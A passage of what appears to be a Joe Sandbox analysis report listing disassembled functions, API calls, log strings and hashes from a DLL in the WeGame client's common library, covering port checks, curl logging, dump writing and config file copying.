                                        • Instruction ID: 2d37950a5d43e3ec6e77b18f54d3518347d443e04da920145fcf620599807710
                                        • Opcode Fuzzy Hash: 4c46d7158eb2ec19e35eb1552f431fcc1cbfdaeda67621b9765563ce6ca45edc
                                        • Instruction Fuzzy Hash: B041AE31A103049FEF18EFB49859EAE77F8EB08214F50541DE11AA7A81EF39A9448F24
                                        Function 6C116C2E Relevance: 29.0, APIs: 23, Instructions: 202COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(?,00000000,00000008,?,?,?,?,6C10E61B,00000000,?,?,6C114C3E,00000000,B33B76E5,?,00000000), ref: 6C116C5D
                                        • memset.VCRUNTIME140(6C33DF0C,00000000,00000020,?,00000000,00000008,?,?,?,?,6C10E61B,00000000,?,?,6C114C3E,00000000), ref: 6C116C69
                                        • memset.VCRUNTIME140(?,00000000,00000020,6C33DF0C,00000000,00000020,?,00000000,00000008,?,?,?,?,6C10E61B,00000000,?), ref: 6C116C75
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000020,6C33DF0C,00000000,00000020,?,00000000,00000008,?,?,?), ref: 6C116C88
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000020,6C33DF0C,00000000,00000020,?,00000000,00000008), ref: 6C116CA2
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000020,6C33DF0C,00000000,00000020,?), ref: 6C116CB0
                                        • memset.VCRUNTIME140(?,00000000,00000010), ref: 6C116CC1
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010), ref: 6C116CCF
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000010), ref: 6C116CDD
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010), ref: 6C116CEB
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010), ref: 6C116CFF
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?), ref: 6C116D0D
                                        • memset.VCRUNTIME140(?,00000000,00000010), ref: 6C116D1E
                                        • memset.VCRUNTIME140(?,00000000,00000028,?,00000000,00000010), ref: 6C116D83
                                        • memset.VCRUNTIME140(?,00000000,00000020,?,00000000,00000028,?,00000000,00000010), ref: 6C116DB2
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000020,?,00000000,00000028,?,00000000,00000010), ref: 6C116DC0
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000020,?,00000000,00000028,?,00000000,00000010), ref: 6C116DCE
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000020,?,00000000,00000028,?), ref: 6C116DDD
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000020,?), ref: 6C116DF0
                                        • memset.VCRUNTIME140(?,00000000,-00000060,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?), ref: 6C116E21
                                        • memset.VCRUNTIME140(?,00000000,00002080,?,00000000,-00000060,?,00000000,00000010,?,00000000,00000010,?,00000000,00000010,?), ref: 6C116E2E
                                        • memset.VCRUNTIME140(?,00000000,-00000060,?,00000000,00002080,?,00000000,-00000060,?,00000000,00000010,?,00000000,00000010,?), ref: 6C116E3E
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,-00000060,?,00000000,00002080,?,00000000,-00000060,?,00000000,00000010,?), ref: 6C116E73
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: ab998b5caee233824e733c929c49252771104639b8a94b61853bb235df34489d
                                        • Instruction ID: 532fb4db917fd6c2e8cf12aecde5bcedbcbb9bdef23342c04c978a9eb512565d
                                        • Opcode Fuzzy Hash: ab998b5caee233824e733c929c49252771104639b8a94b61853bb235df34489d
                                        • Instruction Fuzzy Hash: 4371FEB2B01A06BED369CFB58C84FC6FB9CBF09784F00462AA15CD6640D77465258FE6
                                        Function 6C107F34 Relevance: 28.9, APIs: 19, Instructions: 388COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C107F3E
                                          • Part of subcall function 6C108835: __EH_prolog3.LIBCMT ref: 6C10883C
                                          • Part of subcall function 6C108835: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(00000008,6C107F54,00000009,00000001,000000DC,6C107650,6C1076F7,?,00000005,00000048,00000094,00000014,6C107719,?,6C1076F7,?), ref: 6C10885A
                                          • Part of subcall function 6C108835: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,00000000,6C1076F7,00000008,6C107F54,00000009,00000001,000000DC,6C107650,6C1076F7,?,00000005,00000048,00000094), ref: 6C108887
                                        • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(00000014,?,00000009,00000001,000000DC,6C107650,6C1076F7,?,00000005,00000048,00000094,00000014,6C107719,?,6C1076F7,?), ref: 6C107F6F
                                        • ?flags@ios_base@std@@QBEHXZ.MSVCP140(00000048,00000094,00000014,6C107719,?,6C1076F7,?,00000009,?,6C1076F7), ref: 6C107FB3
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140(?,6C1076F7), ref: 6C107FCC
                                        • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,6C1076F7), ref: 6C108025
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10804E
                                        • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP140(0000002B), ref: 6C10806B
                                        • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP140(0000002D), ref: 6C108086
                                        • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP140(00000020), ref: 6C1080A1
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C1080B2
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10811D
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10813F
                                        • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP140(0000002B), ref: 6C10815B
                                        • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP140(0000002D), ref: 6C108176
                                        • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000), ref: 6C108224
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10825B
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C108292
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000000,?,?,?,00000000,00000000), ref: 6C108377
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C108394
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$U?$char_traits@_$W@std@@@std@@$?pptr@?$basic_streambuf@$?widen@?$basic_ios@_$?width@ios_base@std@@$??1?$basic_ios@H_prolog3$??0?$basic_ios@_??0?$basic_ostream@_?flags@ios_base@std@@?imbue@?$basic_ios@V32@@V?$basic_streambuf@_Vlocale@2@W@std@@@1@_
                                        • String ID:
                                        • API String ID: 723872306-0
                                        • Opcode ID: fd91087dc307b2355a0cef6682e29466e4d0737825d4fe58db1cf390477f2a8e
                                        • Instruction ID: 2259409148203f713a465a0deadf7d8095102b253eaf3adb0da14d42b6619011
                                        • Opcode Fuzzy Hash: fd91087dc307b2355a0cef6682e29466e4d0737825d4fe58db1cf390477f2a8e
                                        • Instruction Fuzzy Hash: F0F14A71B002199FDF14CFA8C894AEDBBB5FF49308F148049E90AAB691DF31E945CB90
                                        Function 6C15FA19 Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 435networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15FA23
                                        • select.WS2_32(00000000,00000000,?,?,?), ref: 6C15FADD
                                        • GetTickCount.KERNEL32 ref: 6C15FAEB
                                        • inet_ntoa.WS2_32(00000000), ref: 6C15FB5F
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,?,?,?,?,00000460,6C160752), ref: 6C15FBA5
                                        • inet_ntoa.WS2_32(0000000F), ref: 6C15FD69
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,00000000,00000001), ref: 6C15FDBA
                                          • Part of subcall function 6C160106: __EH_prolog3_GS.LIBCMT ref: 6C160110
                                          • Part of subcall function 6C0CF613: __EH_prolog3_GS.LIBCMT ref: 6C0CF648
                                        • WSAGetLastError.WS2_32(?,?,?,00000460,6C160752), ref: 6C15FECC
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,00000460,6C160752), ref: 6C15FED8
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,00000460,6C160752), ref: 6C15FFB4
                                        Strings
                                        • [Tcp_port_detect]internal_process socket connect success(%s,%d), xrefs: 6C15FE05
                                        • [Tcp_port_detect]internal_process socket connect timeout(%s,%d), xrefs: 6C15FBFB
                                        • d:\ci_dev\wegame_client\codes\common\src\tcp_port_detect.cpp, xrefs: 6C15FBD4, 6C15FDE6, 6C15FF06, 6C15FFE0
                                        • [Tcp_port_detect]internal_process select failed port=%d,err=%d, xrefs: 6C15FF27
                                        • [Tcp_port_detect]internal_process all ip check over,port = %d, xrefs: 6C160000
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$H_prolog3_$inet_ntoa$CountErrorLastTickselect
                                        • String ID: [Tcp_port_detect]internal_process all ip check over,port = %d$[Tcp_port_detect]internal_process select failed port=%d,err=%d$[Tcp_port_detect]internal_process socket connect success(%s,%d)$[Tcp_port_detect]internal_process socket connect timeout(%s,%d)$d:\ci_dev\wegame_client\codes\common\src\tcp_port_detect.cpp
                                        • API String ID: 3367625610-1722927508
                                        • Opcode ID: a1058aa9bec12b092fee161370d34e0abbf2df912ea83781a452f02c548a0c80
                                        • Instruction ID: 88b6b7567501cf9a9f8abfbadb3c4c6e3517ecc23f4640837927a38d94f934a1
                                        • Opcode Fuzzy Hash: a1058aa9bec12b092fee161370d34e0abbf2df912ea83781a452f02c548a0c80
                                        • Instruction Fuzzy Hash: 3502BDB1901258DFCB14DFA4CD94BEDBBB4AF55308F1000D9D119ABA81EB31AE89CF52
                                        Function 6C1079EE Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 414COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(00000030,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 6C107A13
                                        • ?is@?$ctype@_W@std@@QBE_NF_W@Z.MSVCP140(00000004,?), ref: 6C107A30
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(00000025), ref: 6C107A68
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(00000024), ref: 6C107AAE
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(0000002A), ref: 6C107B5F
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(0000002E), ref: 6C107BC5
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(0000002A), ref: 6C107BE9
                                        • ?is@?$ctype@_W@std@@QBE_NF_W@Z.MSVCP140(00000004,?), ref: 6C107C10
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(0000007C), ref: 6C107D0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: W@std@@$?widen@?$ctype@_$?is@?$ctype@_
                                        • String ID: 3
                                        • API String ID: 4220899879-1842515611
                                        • Opcode ID: 3f55c1a5d8fa5ec7d80e71effa67eef40806666a02dd50372f42ce51f7f428bb
                                        • Instruction ID: cfed8d3f40453f3dff1759cd9d4c5c31280e7a163a3a3752feccc12e1df5badb
                                        • Opcode Fuzzy Hash: 3f55c1a5d8fa5ec7d80e71effa67eef40806666a02dd50372f42ce51f7f428bb
                                        • Instruction Fuzzy Hash: 90F1887170124ADFCB15CF68C585B6A3BB0FF16318F248186E925CBA90DB35EA61CBD1
                                        Function 6C0FAC03 Relevance: 26.6, APIs: 7, Strings: 8, Instructions: 347COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FAC0D
                                        • ?Init@CurlWrapper@curl_wrapper@ierd_tgp@@QAEXXZ.COMMON(00000300), ref: 6C0FAC51
                                          • Part of subcall function 6C0CF613: __EH_prolog3_GS.LIBCMT ref: 6C0CF648
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?), ref: 6C0FBBBE
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\curl_wrapper.cpp, xrefs: 6C0FBBEA, 6C0FBC4A, 6C0FBC96
                                        • [Curlssl_adapter]report failed, rsp_code:%d, task_id:%d, result:%d, curl_perform_result:%d, effective_url: %s, xrefs: 6C0FBCDB
                                        • [Curlssl_adapter] process_curl_task, task_id: %d, process_curl_task: %s, xrefs: 6C0FAC56
                                        • 1, xrefs: 6C0FBCA9
                                        • _tgp_cook_, xrefs: 6C0FB180
                                        • [Curlssl_adapter]report done, msg:%s, xrefs: 6C0FBC0A
                                        • v', xrefs: 6C0FAD5F
                                        • [Curlssl_adapter]report done, huge rsp., xrefs: 6C0FBC61
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$?get_log_instance@base@@CurlInit@Logger@1@Wrapper@curl_wrapper@ierd_tgp@@
                                        • String ID: 1$[Curlssl_adapter] process_curl_task, task_id: %d, process_curl_task: %s$[Curlssl_adapter]report done, huge rsp.$[Curlssl_adapter]report done, msg:%s$[Curlssl_adapter]report failed, rsp_code:%d, task_id:%d, result:%d, curl_perform_result:%d, effective_url: %s$_tgp_cook_$d:\ci_dev\wegame_client\codes\common\src\curl_wrapper.cpp$v'
                                        • API String ID: 543814229-3434119045
                                        • Opcode ID: d2295218d4c762510b2ca2c1455a2a9523c23a9ad3988a48235ca4b69a6e3735
                                        • Instruction ID: 5c408e5b7dc80db384ad5685284c250f3d89642dc60034e4ab6ac0c026b949c4
                                        • Opcode Fuzzy Hash: d2295218d4c762510b2ca2c1455a2a9523c23a9ad3988a48235ca4b69a6e3735
                                        • Instruction Fuzzy Hash: DDE1AE70A01215AFDB24DF24CC54BDDB7F4AF14308F204599E86967A81DB74AACACF92
                                        Function 6C163CD5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 193filethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C163CDC
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070), ref: 6C163CE4
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000070), ref: 6C163D49
                                        • GetCurrentThreadId.KERNEL32 ref: 6C163D92
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C163DA8
                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 6C163E09
                                        • CloseHandle.KERNEL32(?), ref: 6C163E47
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C163E4D
                                        • CloseHandle.KERNEL32(00000000), ref: 6C163F10
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\trace_dump.cpp,000001D9,6C3CE62F), ref: 6C163ED9
                                        Strings
                                        • [TraceDump] dump has been write, process_id=%u, xrefs: 6C163E94
                                        • [TraceDump] Writer Thread will write dump, xrefs: 6C163DE3
                                        • [TraceDump] Writer Thread started, creating file, xrefs: 6C163D1D
                                        • d:\ci_dev\wegame_client\codes\common\src\trace_dump.cpp, xrefs: 6C163D0A, 6C163DCC, 6C163E7D, 6C163EC3
                                        • [TraceDump] dump write failed, process_id=%u, error=%u, xrefs: 6C163EE3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$CloseHandle$CreateCurrentErrorFileH_prolog3H_prolog3_H_prolog3_catch_LastOpenProcessThread
                                        • String ID: [TraceDump] Writer Thread started, creating file$[TraceDump] Writer Thread will write dump$[TraceDump] dump has been write, process_id=%u$[TraceDump] dump write failed, process_id=%u, error=%u$d:\ci_dev\wegame_client\codes\common\src\trace_dump.cpp
                                        • API String ID: 262979499-3059024305
                                        • Opcode ID: 2a2ca0ac460faf41c4dd32bdd93fdfed2f61906c0ed3b9169d8af80d1102d309
                                        • Instruction ID: f6ef18fb3170c7b1dc23b37f8c8fe809c95e77977b97180d3639c840b059b4cf
                                        • Opcode Fuzzy Hash: 2a2ca0ac460faf41c4dd32bdd93fdfed2f61906c0ed3b9169d8af80d1102d309
                                        • Instruction Fuzzy Hash: 4A61FE31A01200ABDB10DFA9CC45F9D77F5AF95718F604158E918BFAC0EB75AD1ACB50
                                        Function 6C0E66EC Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 172COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C0E66F6
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,0000018C), ref: 6C0E6739
                                        • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,?,?,?,?,?,?,0000018C), ref: 6C0E674D
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,0000018C), ref: 6C0E6767
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?,?,?,?,?,0000018C), ref: 6C0E67D6
                                        • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,?,?,?,?,?,?,?,0000018C), ref: 6C0E67E3
                                        • ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?,?,?,?,?,?,?,?,?,0000018C), ref: 6C0E67F1
                                        • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?,?,?,?,?,?,0000018C), ref: 6C0E6800
                                        • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,?,?,?,?,?,?,?,?,0000018C), ref: 6C0E680D
                                        • ?backup_cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000000,?,?,?,?,?,?,?,?,?,0000018C), ref: 6C0E681D
                                        • ?copy_file@filesystem@ierd_tgp@@YAXABVpath@12@0@Z.COMMON(?,?), ref: 6C0E6872
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0E6879
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • [cfg_mgr]file copied: %s, xrefs: 6C0E68C0
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6C0E678B, 6C0E689D
                                        • [cfg_mgr]file not exist: %s, xrefs: 6C0E67AE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?exists@filesystem@ierd_tgp@@?get_log_instance@base@@H_prolog3_catch_Logger@1@U?$char_traits@_V123@V?$allocator@_V?$basic_string@_Vpath@12@@W@std@@$??0path@filesystem@ierd_tgp@@?backup_cfg_folder@?copy_file@filesystem@ierd_tgp@@?create_directory_ex@?filename@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@File_info@common@ierd_tgp@@H_prolog3Sys_wrapper@common@ierd_tgp@@U?$char_traits@V?$allocator@V?$basic_string@Vpath@12@0@Vpath@filesystem@3@Vpath@filesystem@3@@W@2@@std@@W@2@@std@@@
                                        • String ID: [cfg_mgr]file copied: %s$[cfg_mgr]file not exist: %s$d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp
                                        • API String ID: 2847872574-1044149114
                                        • Opcode ID: 77edf9e5c16a4cc104feadc9646e6c8fafca9d6c0048a1a2b3136a3657028517
                                        • Instruction ID: b2f0750d8c8e7bcb1950a4d0eb1c57f1f9afc9f0f6a5383e8d6df00e778c6ea9
                                        • Opcode Fuzzy Hash: 77edf9e5c16a4cc104feadc9646e6c8fafca9d6c0048a1a2b3136a3657028517
                                        • Instruction Fuzzy Hash: 2A61AF71C05248DEDB15DBE8C954BDDBBF4AF25308F608198D140BB681DB766F08DBA1
                                        Function 6C156067 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 119fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C156071
                                        • OpenFileMappingA.KERNEL32(00000004,00000000,00000104), ref: 6C1560BD
                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000084,6C154662,?,?,00000104), ref: 6C1560D3
                                        • memmove.VCRUNTIME140(?,00000000,?,?,00000084,6C154662,?,?,00000104), ref: 6C1560E9
